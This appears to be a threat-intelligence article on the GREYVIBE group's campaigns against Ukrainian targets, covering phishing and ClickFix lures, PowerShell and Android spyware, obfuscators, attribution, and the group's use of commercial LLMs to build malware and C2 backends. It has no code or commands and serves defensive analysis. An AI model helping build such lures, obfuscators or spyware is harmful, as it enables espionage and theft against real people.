The convergence of geopolitical warfare and emerging technical frameworks has given rise to a highly fluid threat landscape where traditional attribution boundaries are increasingly obsolete. Cybersecurity research has exposed a persistent, multi-vector activity set spearheaded by a threat group designated as GREYVIBE. Operating since at least August 2025, this Russia-nexus adversary has aggressively targeted Ukrainian military, governmental, civilian, and commercial infrastructure. What distinguishes GREYVIBE from historical advanced persistent threats (APTs) is not an overwhelming baseline of architectural sophistication, but rather its systematic integration of generative artificial intelligence (GenAI) and large language models (LLMs) across the entire software development and attack lifecycle. By utilizing commercial LLMs to bridge inherent technical capability gaps, the group maintains a rapid operational tempo, spinning up custom loaders, obfuscation layers, and custom remote access trojans (RATs) to evade signature-based detection mechanisms.
Deconstructing the Multi-Vector Delivery Architecture
GREYVIBE relies on a highly diversified set of initial access campaigns that leverage tailored social engineering lures paired with a uniform decoy-and-payload execution logic designed to maintain credibility while executing background code. The first core delivery mechanism, tracked as PhantomMail, represents an ongoing spear-phishing pipeline targeting strategic Ukrainian entities, including energy providers, the Kyiv City Council, the Main Directorate of the State Emergency Service, and the State Service of Special Communications and Information Protection. These phishing operations utilize links pointing to malicious ZIP or RAR archives hosted on third-party file-sharing infrastructure such as Google Drive and 4sync. Upon extraction, these archives launch JavaScript- or PyInstaller-based loaders that execute a benign front-facing decoy document while silently mapping out the initial infection vectors.
Simultaneously, the threat actor has experimented with PhantomClick, a campaign leveraging “ClickFix” infrastructure where compromised or fraudulent domains masquerade as legitimate Zoom conferences or Latvian Platform for Development Cooperation (LAPAS) verification gateways. When a target lands on these custom landing pages, they are prompted via localized Ukrainian text to execute specific terminal commands under the guise of completing a Cloudflare security verification check. In reality, this action executes a malicious payload chain directly within the host operating system.
The most persistent and targeted initial access vector observed is the PrincessClub infrastructure. This campaign utilizes fraudulent adult-entertainment websites specifically localized to lure Ukrainian combatants, particularly around highly targeted operational zones like Kharkiv. The operators deploy artificial female personas across localized Telegram dating groups to conduct targeted human intelligence (HUMINT) staging, gradually building trust before routing victims to the credential harvesting or malware delivery portals. Later iterations of these PrincessClub portals integrated sophisticated WebRTC-based live call architectures; post-infection, these components transition from static landing decoys into real-time audio and video interception nodes, representing a serious threat to operational security on physical devices.
Beyond these channels, the threat infrastructure extends into campaigns like DroneLink and Nebo. Deployed between March and April 2026, DroneLink exploits fraudulent military charity foundations masquerading as support groups for the Armed Forces of Ukraine (specifically focusing on FPV drones and unmanned aerial vehicle procurement). Nebo relies on a localized Russian-language lure (“СПО НЕБО”) that projects a false login screen mimicking tactical military software. This specific component hardcodes automated telephone exchange (“ATC-P”) routing codes consistent with secure defense communications networks utilized inside the Russian military apparatus. This specialized implementation is deliberately architected to deceive Ukrainian defense personnel into believing they are accessing a compromised or exposed Russian tactical terminal, demonstrating a nuanced psychological manipulation vector.
Technical Dissection of the Custom Malware Ecosystem
The primary payload payload pipeline utilized by GREYVIBE is divided across three core custom-developed families: PhantomRelay, LegionRelay, and FallSpy. PhantomRelay is structured as a modular, PowerShell-based remote access trojan that utilizes a strict two-stage operational framework. The first stage initiates an extensive system fingerprinting script designed to gather target environment telemetry before calling the secondary, main RAT client. Command and Control (C2) operations rely on persistent WebSockets connections, allowing operators to feed dynamic PowerShell commands and external extensions directly into memory without writing static signatures to disk.
Analysis of this specific codebase revealed a distinct evolutionary lineage. A base variant, designated as PhantomRelayLite, was discovered across multiple seemingly disparate cybercriminal operations, including a Microsoft Teams voice-phishing (vishing) operation and a KongTuke ClickFix campaign. GREYVIBE weaponized this foundation into PhantomRelayV1, which integrated a specialized watchdog persistence architecture and migrated to the group’s custom DAYLIGHT obfuscator. This was later succeeded by PhantomRelayV2, which completely refactored the structural codebase while preserving the underlying WebSocket-based C2 communication logic.
[Target Environment]
│
├── (Initial Access: PhantomMail / PhantomClick / PrincessClub)
│
└───► [Stage 1: Fingerprinting Script]
│
└───► [Stage 2: Main PhantomRelay Client]
│
▼
[Persistent WebSockets C2] ◄───► (Dynamic Extension Scripts)
For mobile tracking operations, GREYVIBE deploys FallSpy, a highly intrusive Android spyware framework active since August 2025. Typically dropped via the PrincessClub or Nebo mobile vectors, FallSpy maintains a dual-state operational model where it present functional decoy views to the user while concurrently spawning background services to scrape and exfiltrate contacts, SMS logs, localized application metadata, SIM card parameters, active Wi-Fi SSIDs, geographical coordinate tracking, and on-device media storage structures back to designated C2 points.
On Windows endpoints, operators deploy LegionRelay, a highly streamlined, lightweight PowerShell RAT that relies entirely on REST API methods for its C2 check-in loops. The client-side footprint of LegionRelay is minimally designed, serving primarily as an execution conduit for heavily obfuscated post-compromise frameworks. Operators have been observed using LegionRelay to systematically execute file system enumeration, data exfiltration, automated desktop screenshot captures, browser credential theft, and targeted exfiltration of session data for secure chat applications including Telegram and WhatsApp, alongside setting up unauthorized Remote Desktop Protocol (RDP) backdoors.
Obfuscation Engineering and Cryptographic Loaders
To counter continuous detection mechanisms implemented by modern Endpoint Detection and Response (EDR) platforms, GREYVIBE maintains a dedicated development cycle centered around rotating custom obfuscators and loader utilities. The group’s early deployment phases relied heavily on LOOKVALPS (a specialized PowerShell engine) and LOOKVALJS (a companion JavaScript obfuscation packer). As blue-team detection strategies evolved, the group engineered a complete migration pathway in October 2025, introducing DAYLIGHT, a highly randomized PowerShell obfuscator that was applied extensively across both early-stage delivery stagers and post-compromise tooling extensions. By March 2026, the group supplemented this toolset with TEASOUP, a complex JavaScript obfuscator built to succeed the aging LOOKVALJS codebase.
The rapid implementation and structurally distinct layouts of these custom packers point to an optimized development pipeline. Technical markers indicate that these obfuscation routines do not follow traditional manual coding patterns or established open-source structural templates. Instead, the logic structures point heavily toward automated code generation, where variable randomization, control flow flattening, and functional layering are handled programmatically. This continuous rotation of cryptographic packaging mechanisms ensures that traditional file-based hash checking and basic heuristic analysis fail to identify incoming payloads before the execution phase begins.
Generative AI as an Operational Enabler
The hallmark characteristic of GREYVIBE’s operational profile is its systematic, platform-wide integration of Generative AI (GenAI) and large language models (LLMs) across every critical phase of the cyber-attack lifecycle. Intelligence analysis indicates active utilization of multiple commercial cognitive engines, including Ideogram AI for automated image synthesis, alongside ChatGPT and Google Gemini for software development tasks. In the resource generation phase, the group heavily relies on these LLMs to write and refine complex scripts, build out the full-stack structural backend for the LegionRelay C2 framework, and automatically draft configuration scripts for target server environments. Post-compromise operational loops similarly leverage LLM engines to instantly generate context-dependent terminal scripts and administrative utilities tailored to the unique system parameters harvested during initial host fingerprinting.
However, this reliance on AI exposes an architectural double-edged sword. While LLMs enable the group to rapidly accelerate development tempos and offset significant technical capability gaps, they simultaneously inject structural vulnerabilities into their software. WithSecure identified critical logic and design flaws within the backend of LegionRelay—errors highly indicative of AI-generated code that lacks rigorous human verification. These specific implementation flaws inadvertently exposed a limited subset of LegionRelay’s internal server functionality, providing defensive researchers with a clear, unintended window of visibility over an extended monitoring period. This defensive telemetry ultimately allowed security analysts to map out the actor’s broader victimology, active operational directives, and precise post-compromise behavior without the threat group realizing their command line structures had been structurally compromised.
Attribution Ambiguity and Hybrid Threat Profiles
The physical positioning and geopolitical alignment of GREYVIBE point clearly toward a Russian state nexus, though its structural composition remains deeply intertwined with the broader cybercriminal ecosystem. Forensic artifact collection confirms that developers and active threat operators are natively Russian-speaking and run their campaigns strictly aligned with the Moscow time zone (UTC+3). This assessment is validated by extensive Russian-language commentary discovered within active backend source files, localized configuration settings pointing to the Russian locale across developer machines, and empirical tracking showing that post-compromise activity spikes heavily during standard Moscow business hours. The strategic targeting priorities, heavily weighted toward Ukrainian government, energy, and defense targets, strongly align with state-directed intelligence collection mandates in the context of the active regional conflict.
┌────────────────────────────────────────────────────────┐
│ GREYVIBE ATTRIBUTION │
└───────────────────────────┬────────────────────────────┘
│
┌─────────────────────────┴─────────────────────────┐
▼ ▼
┌─────────────────────────────────┐ ┌─────────────────────────────────┐
│ RUSSIAN STATE INTERESTS │ │ CYBERCRIME ECOSYSTEM │
├─────────────────────────────────┤ ├─────────────────────────────────┤
│ • Targeted Ukrainian Logistics │ │ • TrickBot / UAC-0098 ISO Tools │
│ • Intelligence & Surveillance │ │ • Shared PhantomRelayLite Base │
│ • Moscow Business Hours (UTC+3) │ │ • XMRig Crypto-Miner Payloads │
│ • Localized Secure Defense Lures│ │ • Slang Variables (e.g., 'uwu') │
└─────────────────────────────────┘ └─────────────────────────────────┘
Concurrently, the group’s technical DNA exhibits significant overlap with profit-driven cybercrime infrastructure. Early development samples indicate the utilization of a highly specialized, proprietary ISO construction utility tied historically to the TrickBot threat ecosystem and UAC-0098—an activity cluster largely composed of former TrickBot developers targeting Ukrainian organizations. Additional anomalies include frequent operator mistakes, such as uploading active test and development binaries directly to public classification engines like VirusTotal, alongside utilizing informal, internet slang variable strings (e.g., "letsrollboyos", "totallyunsus", and "cuteuwu"). Furthermore, the discovery of XMRig cryptocurrency miners dropped onto a small subset of LegionRelay-compromised machines highlights a non-standard operational profile for traditional, highly disciplined state-backed intelligence teams. This indicates a hybrid operational architecture where state-directed cyber operations are executed by co-opted, contracted, or newly integrated cybercriminal elements.
Our Opinion on the GREYVIBE Case
The emergence of GREYVIBE highlights a significant and dangerous shift in the modern threat landscape: the democratization of cyber warfare through generative AI. Traditionally, nation-state operations required massive capital investments and highly specialized developer cadres to build unique, modular implants. By weaponizing large language models like ChatGPT and Google Gemini, low-to-moderately sophisticated threat actors can bypass historical capability barriers, rapidly iterating custom obfuscators like DAYLIGHT and TEASOUP to disrupt signature-based detection.
However, this reliance on AI exposes a fundamental paradox. While LLMs accelerate operational tempo and lure engineering—as seen in the highly deceptive PrincessClub and Nebo campaigns—they also introduce systemic vulnerabilities. The design flaws uncovered in LegionRelay’s backend demonstrate that AI-generated code frequently suffers from logical oversight, granting defenders extended telemetry and unexpected visibility.
Furthermore, GREYVIBE’s blend of Russian state-aligned intelligence objectives with cybercriminal hallmarks, such as XMRig deployment and TrickBot infrastructure overlaps, suggests a hybrid threat model. In our opinion, the state co-optation of low-tier criminal elements armed with commercial AI creates highly volatile, unpredictable threat vectors. Security architectures must evolve beyond static file-based indicators, focusing instead on behavior-centric telemetry capable of catching rapidly evolving, AI-assisted malicious pipelines.
